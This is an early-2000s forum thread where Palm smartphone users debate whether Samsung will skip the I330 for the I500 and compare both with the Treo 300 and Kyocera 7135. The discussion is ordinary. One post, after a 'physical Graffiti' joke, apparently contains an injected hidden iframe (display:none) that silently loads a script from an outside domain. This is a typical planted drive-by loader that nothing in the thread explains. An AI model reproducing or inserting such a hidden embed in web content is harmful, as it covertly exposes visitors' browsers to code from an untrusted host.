+ Reply to Thread

Thread: I330 vs I500

I330 vs I500

We will probably never get the chance to answer that question.

Here is an interesting scenario. The I330 has been hinted at, but not actually released for quite a while. You would think that they would want to jump on the 3G bandwagon, but they sat at the sidelines.

With the Treo 300 out the door, and the Kyocera 7135 just around the corner, the I330 really looks a little like a brick, a little long in the tooth, with just a few cosmetic changes to go along with the 3G stuff. If they were to release the I330 now, it would look about as old next to the Treo and 7135 as the Kyocera 6035 looks when you compare it to the I300.

So here is the possibility. Might Samsung just be trying to skip the I330 all together, and just rush the I500 (aka Bluechip) to market to avoid looking antiquated?

There are a lot of facts to back this up. First of all, why, after all this time, no SDK? Especially if the I330 is as close to the I300 as it seems to be? Answer: Why encourage the use of the long screen if it wont be around long. Why didn't the I330, a phone that has been developed and has been shown around since January, make an appearance at the 3G launch? Answer: It would have looked like an antique compared to the other phones. And they cant even have a stealth launch now, because it would look even worse. There is only one thing worse than releasing a phone that looks like last years model at the same time as people are showing off the latest stuff: Releasing the last years model a month after someone releases the latest greatest stuff.

Don't ever expect to see the I330 in the light of day.
    (Boy, this should generate a reaction!)

Logical...

good point

(Click a sponser today!)

Re: I330 vs I500

[i]Don't ever expect to see the I330 in the light of day.
    (Boy, this should generate a reaction!) [/B]
    Maybe not as much reaction as you think. I believe a lot of us (as much as we love our 300's) realize that the form factor is now an antique and the 330 simply doesn't improve enough on what we have (as you stated).
    Gary

Wannabe Techie

You said it buddy...

I love my i300 but its definitely time for a change. I use it as my primary phone and pda but it seems to bulk around at times. The Treo "looks" great and the 7135 "seems" awesome, so maybe Samsung just figured why try to compete for last place. I'm not financially fit to keep upgrading my phone so hopefully we'll have a clear winner in the Smartphone department by Christmas time (you reading this honey?) and we can all rest easy. Sorry Samsung but too little too late.
    "...my palms are too hairy to hide."
    -Eminem

I love my i300 but its definitely time for a change
    yup....... I gotta agree but the replacement for it is as yet undefined. All of the current crop of smartphones have problems I'm not willing to pay $500-800 to deal with. Fixed batteries, physical graffiti areas, number pads for typing....... IMO it's replacement isn't even on the horizon.
    .....beam me up Scotty...

If you knew that i500 is right around the corner, let alone the Kyo 7135, would you buy i330? Who would be the target consumers? There still is no SDK so no apps will take advantage of the extended screen... Graffiti hacks are nice, but would you choose i330 (or i300) over devices with physical Graffiti just so you can customize the Graffiti area?

All things being equal (and it is not, i330 has OS 3.5 and a 33MHz Dragonball, 256 colors only while i500 is 4.1/66/16bit) what is the main attraction of i330?

Price? (Assuming i330 will undercut i500 as well as others such as Treo300) Availability? (So when is i500 coming out? i330 is taking long enough)

If i330 is the low-end, and i500 high-end, can Samsung and Sprint make money off i330? They surely can't overcharge for i500 with Treo 300 and more feature rich 7135.

More I think about this, more druce's post makes sense.

But still... I love the i330. It feels great in my hand, and there
    is a feel of quality missing in Treo's even if there is somewhat
    limited actual functionality.

but would you choose i330 (or i300) over devices with physical Graffiti just so you can customize the Graffiti area?
    No I wouldn't but that isn't the only factor. Maybe the Bluechip will move me when it comes along but the Treo, Kyo, PocketPC thera-lookalike, et al don't so it's the I300 til something better comes along (and that probably won't be the I330 either).

i really love my i300, but I will upgrade to the first palm/wince device that comes out that can support the new PCS Vision service, sync with outlook and dual bands. I travel to much to not have analog...

Originally posted by rave
    ... Graffiti hacks are nice, but would you choose i330 (or i300) over devices with physical Graffiti just so you can customize the Graffiti area?
    "physical Graffiti" - Robert Plant and Jimmy Page would be so proud. Who knew they were such visionaries? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow More info on the I500...

So the chip in the i500 is twice as fast as that in the 7135? Now, that's a bummer. Is this real speed or are there other factors that make up the precieved speed of the palm?
    Carl

Thumbs down ugh!!!!!!.................

"Kyocera is close to releasing a smartphone that is remarkably similar to the i500"(PalmInfoCenter- Marc's link)...... no ****! ...it's the same form factor, most of the same problems (in my mind). All it needs is a fixed battery & itsa clone. Samsung's response to Kyo?.....probably think they can respond to the 7135 and then ride in on a white horse & save us with the Bluechip or I330. Gawd...I hope, prospects remain dismal. Where is the evidence of the R&D that should have followed the advent of smartphones????? Not in the current crop... including the I500. :mad...lol, sowwy but to quote another member addressing the same thing "I am uninspired."